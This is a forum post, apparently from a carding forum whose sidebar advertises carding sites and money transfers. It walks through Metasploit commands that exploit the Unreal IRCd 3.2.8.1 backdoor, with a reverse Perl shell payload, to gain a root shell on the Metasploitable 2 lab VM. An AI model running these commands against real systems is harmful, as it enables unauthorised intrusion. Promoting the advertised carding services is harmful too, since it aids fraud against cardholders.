banner Expire 1 July 2024
Ad Ends 13 July 2024
banner Expire 15 July 2024
banner Expire 18 October 2024
ad End 18 October 2024
Ad Ends 13 July 2023
banner Expire 20 July 2024
What's new
Ad expire at 5 June 2024
UniCvv
CrdCrew.cc Carding forum
Western union transfer
Kfc CLub
Carding.pw carding forum
adv exp at 23 August 2024

Hacking Unreal IRCD 3.2.8.1

Daniel

TRUSTED VERIFIED SELLER
Staff member
Joined
Jun 13, 2020
Messages
6,712
Reaction score
899
Points
212
Awards
2
  • trusted user
  • Rich User
Now we will be exploiting this backdoor in Unreal IRCD using Metasploit. Let’s fire up msfconsole and search for the correct module using the following command:

Code:

search Unreal IRCD


Metasploit-unreal-ircd-exploit.png






We will be using the unreal_ircd_3281_backdoor exploit.

Now type the following command to use the correct module:

Code:

use exploit/unix/irc/unreal_ircd_3281_backdoor

Next we look for a compatible payload and select one using the set payload command:

Code:

show payloads
set payload cmd/unix/reverse_perl

Metasploit-unreal-IRCD-payloads.png





Now type show options to see what fields we need to modify and set the correct values:

Code:

show options
set rhost [target ip]
set lhost [attackbox ip]

Metasplouit-Unreal-ircd-exploit-options.png





And type run to execute the exploit:

Metasploit-unreal-ircd-root-shell.png





root shell.

And there we got a root shell on Metasploitable 2 using the backdoor in Unreal IRCD.
 
Ad End 1 July 2024
Top